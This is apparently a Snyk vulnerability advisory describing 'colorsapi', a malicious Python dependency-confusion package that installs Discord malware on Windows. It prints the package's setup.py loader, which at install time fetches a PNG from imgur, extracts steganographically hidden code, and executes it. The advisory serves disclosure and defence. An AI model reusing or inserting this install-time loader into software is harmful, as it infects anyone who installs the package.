Malicious Package Affecting colorsapi package, versions [0,]
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-COLORSAPI-3112353
- published 11 Nov 2022
- disclosed 11 Nov 2022
- credit Raul Onitza-Klugman, Snyk
Introduced: 11 Nov 2022
Malicious CVE NOT AVAILABLE CWE-506 Open this link in a new tabHow to fix?
Avoid using all malicious instances of the colorsapi
package.
Overview
colorsapi is a malicious package. This is a "dependency confusion" package, which means the package name is based on existing repositories, namespaces, or components, it aims to trick users into downloading the package which contains a malicious code.
The malicious package injects a Discord malware into Windows machines, by injecting itself into the registry. The attack is initiated by downloading a malicious .png
file, after which it downloads and executes a malicious Python script. The malicious code is heavily obfuscated and the attack is multi-staged.
Malicious Code
Initial stage of the attack can be found in the setup.py
file
import os
from setuptools import setup, find_packages
try:
import requests
from judyb import lsb
except:
os.system('pip install requests')
os.system('pip install judyb')
import requests
from judyb import lsb
try:
if os.path.exists(f'{os.getenv("TEMP")}\aRl53RS.png') != True:
r = requests.get('https://i.imgur.com/aRl53RS.png')
with open(f'{os.getenv("TEMP")}\aRl53RS.png', 'wb') as f:
f.write(r.content)
exec(lsb.reveal(f'{os.getenv("TEMP")}\aRl53RS.png'))
else:
r = requests.get('https://i.imgur.com/aRl53RS.png')
with open(f'{os.getenv("APPDATA")}\aRl53RS.png', 'wb') as f:
f.write(r.content)
exec(lsb.reveal(f'{os.getenv("APPDATA")}\aRl53RS.png'))
except:
pass